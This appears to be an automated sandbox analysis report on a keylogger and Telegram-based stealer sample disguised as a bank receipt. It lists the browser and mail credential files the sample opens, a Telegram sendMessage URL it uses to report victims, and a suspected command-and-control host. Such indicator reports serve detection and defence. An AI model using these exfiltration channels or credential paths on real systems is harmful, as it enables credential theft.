                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Users\user\AppData\Roaming\fahKSvwo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Users\user\AppData\Roaming\fahKSvwo.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: fahKSvwo.exe PID: 7696, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 8.2.e-dekont_html.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 3756, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: e-dekont_html.exe PID: 7308, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		111
                Process Injection                		1
                Deobfuscate/Decode Files or Information                		1
                Input Capture                		13
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job                		3
                Obfuscated Files or Information                		Security Account Manager1
                Query Registry                		SMB/Windows Admin Shares1
                Screen Capture                		11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing                		NTDS11
                Security Software Discovery                		Distributed Component Object Model1
                Email Collection                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Process Discovery                		SSH1
                Input Capture                		14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                Virtualization/Sandbox Evasion                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc Filesystem1
                System Network Configuration Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559103 Sample: e-dekont_html.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 13 other signatures 2->68 8 e-dekont_html.exe 7 2->8         started        12 fahKSvwo.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\Roaming\fahKSvwo.exe, PE32 8->38 dropped 40 C:\Users\...\fahKSvwo.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp7653.tmp, XML 8->42 dropped 44 C:\Users\user\...\e-dekont_html.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 powershell.exe 23 8->14         started        17 e-dekont_html.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 fahKSvwo.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 61282, 61290 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.130.0, 49733, 49738, 49740 ORACLE-BMC-31898US United States 17->48 50 2 other IPs or domains 17->50 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                e-dekont_html.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                e-dekont_html.exe67%VirustotalBrowse
                e-dekont_html.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\fahKSvwo.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\fahKSvwo.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Roaming\fahKSvwo.exe67%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.97.3
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.130.0
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            https://reallyfreegeoip.org/xml/8.46.123.75false
                              		high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.fontbureau.com/designersGe-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bThee-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orge-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/bote-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers?e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.come-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20ae-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designerse-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E70000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004014000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004137000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004061000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004647000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004571000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043F4000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004523000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000437F000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.kre-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enfahKSvwo.exe, 0000000D.00000002.4162043162.0000000003454000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/project_mgtDataSet.xsdOproject_mgt_system.Properties.Resourcese-dekont_html.exe, fahKSvwo.exe.0.drfalse
                                                          		high
                                                          http://varders.kozow.com:8081e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sajatypeworks.come-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.typography.netDe-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.founder.com.cn/cn/cThee-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/staff/dennis.htme-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.75$e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000331A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installe-dekont_html.exe, 00000008.00000002.4169157251.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003EC0000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E76000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.000000000401A000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000004112000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4169157251.0000000003E4B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004386000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000435B000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.0000000004622000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.000000000452A000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4169334415.00000000043D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://checkip.dyndns.org/qe-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleasee-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fonts.come-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.sandoll.co.kre-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.urwpp.deDPleasee-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.zhongyicts.com.cne-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee-dekont_html.exe, 00000000.00000002.1769422089.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 00000009.00000002.1839101508.0000000002D05000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.sakkal.come-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000000.00000002.1776697265.0000000005D10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://chrome.google.com/webstore?hl=enlBfqe-dekont_html.exe, 00000008.00000002.4161363308.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.000000000345E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://reallyfreegeoip.org/xml/e-dekont_html.exe, 00000000.00000002.1772474517.0000000003C49000.00000004.00000800.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, e-dekont_html.exe, 00000008.00000002.4161363308.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000032F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.office.com/fahKSvwo.exe, 0000000D.00000002.4162043162.0000000003494000.00000004.00000800.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4162043162.00000000033A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0e-dekont_html.exe, 00000000.00000002.1776905061.0000000006EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
